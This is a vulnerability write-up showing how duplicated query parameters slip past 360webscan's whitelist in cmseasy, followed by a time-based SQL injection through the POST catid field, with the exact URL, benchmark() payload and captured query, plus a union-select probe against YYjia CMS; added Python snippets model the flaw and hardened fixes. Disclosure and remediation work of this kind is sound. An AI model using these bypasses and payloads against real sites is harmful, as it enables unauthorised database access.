Bypassing 360webscan via HPP in CMSes that bundle it (with a new cmseasy SQL injection)
After thinking it over, I wasn't sure whether this vulnerability belongs to 360 or to cmseasy, but I finally settled on cmseasy.
The latest version of cmseasy, installed with default settings.
webscan_cache.php:
    // Default URL whitelist. Note: the same PHP array key is used three times,
    // and in a PHP array literal the last duplicate key wins, so only 'case=admin' survives.
    $webscan_white_url = array('index.php' => 'admin_dir=admin','index.php' => 'case=file','index.php' =>'case=admin');
Then look at the main check.
360webscan.php:
    if ($webscan_switch&&webscan_white($webscan_white_directory,$webscan_white_url)) {
        if ($webscan_get) {
            foreach($_GET as $key=>$value) {
                webscan_StopAttack($key,$value,$getfilter,"GET");
            }
        }
        // ...
    }
First condition: $webscan_switch, which is set to 1 at initialization.
Second condition: webscan_white() must return true; if it returns false, the request is not checked at all.
Follow webscan_white():
    function webscan_white($webscan_white_name,$webscan_white_url=array()) {
        $url_path=$_SERVER['SCRIPT_NAME'];
        $url_var=$_SERVER['QUERY_STRING'];   // raw query string, not the parsed $_GET
        // whitelisted directory: skip detection
        if (preg_match("/".$webscan_white_name."/is",$url_path)==1&&!empty($webscan_white_name)) {
            return false;
        }
        foreach ($webscan_white_url as $key => $value) {
            if(!empty($url_var)&&!empty($value)){
                // substring match on the raw query string
                if (stristr($url_path,$key)&&stristr($url_var,$value)) {
                    return false;
                }
            } elseif (empty($url_var)&&empty($value)) {
                if (stristr($url_path,$key)) {
                    return false;
                }
            }
        }
        return true;
    }
This function needs little analysis: it is the whitelist check. If the request matches a whitelist entry, no detection is performed.
    if (stristr($url_path,$key)&&stristr($url_var,$value)) {
        return false;
    }
Obviously, if the script path contains $key and the query string contains $value, false is returned.
From the analysis above, with the default whitelist any request whose query string contains case=admin is not checked.
Under HPP on Apache/PHP, for the parameters case=admin&case=123 the server ends up with case=123, so the whitelisted value does not affect the application's logic.
Sending the URL:
As can be seen, the defense does not trigger.
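To make the whitelist problem concrete, here is an added example (not code from 360webscan or cmseasy) that models the original substring check against the effective value PHP actually receives, flags repeated parameters, and shows a hardened whitelist that compares the parsed value exactly; the script path and query strings are taken from the request above.

```python
"""Model of 360webscan's whitelist check next to a hardened version (added example,
not code from 360webscan or cmseasy). Query strings are parsed the way PHP fills
$_GET: when a parameter is repeated, the last value wins."""
from urllib.parse import parse_qsl

# The shipped whitelist uses one PHP array key three times, so only the last entry
# survives; this is what the original check effectively sees.
WHITE_URL_AS_PHP_SEES_IT = {"index.php": "case=admin"}
# A list of pairs keeps every entry (used by the hardened version).
WHITE_URL_ENTRIES = [("index.php", "admin_dir=admin"),
                     ("index.php", "case=file"),
                     ("index.php", "case=admin")]


def php_get(query):
    """Mimic $_GET: later duplicates overwrite earlier ones."""
    params = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        params[key] = value
    return params


def polluted_params(query):
    """Names that appear more than once with differing values (worth logging)."""
    seen = {}
    for key, value in parse_qsl(query, keep_blank_values=True):
        seen.setdefault(key, set()).add(value)
    return {k for k, v in seen.items() if len(v) > 1}


def webscan_white_original(script_name, query):
    """True = run detection, False = whitelisted. Case-insensitive substring
    match on the raw QUERY_STRING, exactly like the original."""
    for key, value in WHITE_URL_AS_PHP_SEES_IT.items():
        if query and value and key.lower() in script_name.lower() \
                and value.lower() in query.lower():
            return False
    return True


def webscan_white_hardened(script_name, query):
    """Same contract, but matches the effective parameter value by exact
    name and value, so a repeated parameter cannot hide behind the whitelist."""
    effective = php_get(query)
    for key, entry in WHITE_URL_ENTRIES:
        name, _, expected = entry.partition("=")
        if script_name.lower().endswith(key) and effective.get(name) == expected:
            return False
    return True
```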
Now check whether SQL injection is possible.
archive_act.php:
    function search_action() {
        //print_r($_SESSION);exit();
        if (front::get('ule')) {
            front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
            front::$get['keyword'] = urldecode(front::$get['keyword']);
        }
        if (front::get('keyword') && !front::post('keyword'))
            front::$post['keyword'] = front::get('keyword');
        front::check_type(front::post('keyword'), 'safe');
        if (front::post('keyword')) {
            $this->view->keyword = trim(front::post('keyword'));
            session::set('keyword', trim(front::post('keyword')));
            /*
            if (isset(front::$get['keyword']))
                front::redirect(preg_replace('/keyword=[^&]+/', 'keyword='.urlencode($this->view->keyword), front::$uri));
            else
                front::redirect(front::$uri.'&keyword='.urlencode($this->view->keyword));
            */
        } else {
            $this->view->keyword = session::get('keyword');
        }
        // keyword is filtered; catid below is not
        if (preg_match('/union/i', $this->view->keyword) || preg_match('/"/i', $this->view->keyword) || preg_match('/\'/i', $this->view->keyword)) {
            exit('invalid parameter');
        }
        $path = ROOT.'/data/hotsearch/'.urlencode($this->view->keyword).'.txt';
        $mtime = @filemtime($path);
        $time = intval(config::get('search_time')) ? intval(config::get('search_time')) : 30;
        if (time() - $mtime < $time && !front::get('page')) {
            //alertinfo('Repeated searches are not allowed within '.$time.' seconds', 'index.php?t='.front::get('t'));
        }
        $keywordcount = @file_get_contents($path);
        $keywordcount = $keywordcount + 1;
        file_put_contents($path, $keywordcount);
        $type = $this->view->category;
        $condition = "";
        if (front::post('catid')) {
            $cateobj = category::getInstance();
            $sons = $cateobj->sons(front::post('catid'));
            if (is_array($sons) && !empty($sons)) {
                $cids = front::post('catid').','.implode(',', $sons);
            } else {
                $cids = front::post('catid');
            }
            // raw POST value concatenated straight into the SQL condition
            $condition .= "catid in (".$cids.") AND ";
            // ... rest of the function omitted
If post [catid] is submitted here, it constitutes an SQL injection.
We are following up:
function getrows($condition='',$limit=1,$order='1 desc',$cols='*') { $this->condition($condition); $this->record_count=$this->rec_count($condition); $res=$this->rec_select($condition,$limit,'*',$order); return $res; }
function condition(&$condition) { if (isset($condition) &&is_array($condition)) { $_condition=array(); foreach ($condition as $key=>$value) { //$value=str_replace("'","\'",$value); $key = htmlspecialchars($key,ENT_QUOTES); if(preg_match('/(if|select|ascii|from|sleep)/i', $value)){ //echo $condition; exit('sql inject'); } if(preg_match('/(if|select|ascii|from|sleep)/i', $key)){ //echo $condition; exit('sql inject'); } $_condition[]="`$key`='$value'"; } $condition=implode(' and ',$_condition); } else if (is_numeric($condition)) { if(preg_match('/(if|select|ascii|from|sleep)/i', $condition)){ //echo $condition; exit('sql inject'); } $this->getFields(); $condition="`$this->primary_key`='$condition'"; }else if(true === $condition){ $condition = 'true'; }else{ //echo $condition." __ "; if(preg_match('/(if|select|ascii|from|sleep)/i', $condition)){ //echo $condition; exit('sql inject'); } }
I found that there was another layer of defense; I could only use benchmark here.
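As an added example (not cmseasy's own code), the following contrasts the keyword blacklist from condition() with positive validation of catid: the blacklist is reproduced from the page, the vulnerable concatenation mirrors search_action(), and the hardened builder casts every id to an integer and emits a parameterised IN clause with DB-API style %s placeholders.

```python
"""Why the five-word blacklist in cmseasy's condition() misses the catid injection,
and the positive validation that closes it. Added example, not cmseasy's code."""
import re

# The blacklist from condition(): only these tokens are rejected.
SQL_BLACKLIST = re.compile(r"(if|select|ascii|from|sleep)", re.IGNORECASE)


def blacklist_rejects(value):
    """Mirror of condition(): True if the value would hit exit('sql inject')."""
    return SQL_BLACKLIST.search(value) is not None


def build_condition_original(catid, sons):
    """The vulnerable concatenation from search_action(): catid goes in as-is."""
    cids = catid + "," + ",".join(sons) if sons else catid
    return "catid in (" + cids + ") AND "


def validate_catid(catid):
    """Positive validation: catid must be a non-negative integer string."""
    s = str(catid).strip()
    if not s.isdigit():
        raise ValueError("catid must be an integer")
    return int(s)


def build_condition_hardened(catid, sons):
    """Parameterised IN clause: every id is validated as an int and the values
    travel separately from the SQL text, so no input reaches the parser."""
    ids = [validate_catid(catid)] + [validate_catid(s) for s in sons]
    placeholders = ",".join("%s" for _ in ids)
    return "catid in (" + placeholders + ") AND ", ids
```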
URL:
    http://localhost:8081/cmseasy/uploads/index.php?case=admin&case=archive&act=search&catid=8
Post data:
    catid=3) and benchmark(10000000,md5(123))#
Delay of 7 seconds.
Captured SQL:
    17:58 SELECT * FROM `cmseasy_archive` WHERE catid in (3) and benchmark(10000000,md5(123))#) AND (title like '%') and (state is null or state <> '-1') order by `storder`,1 DESC limit 0,12
Checking another CMS:
YYjia cms
Sending the URL:
    http://localhost:8081/index.php?m=admin&ac=register&a=1 union select 1,2,3,4
Solution:
Filter the input.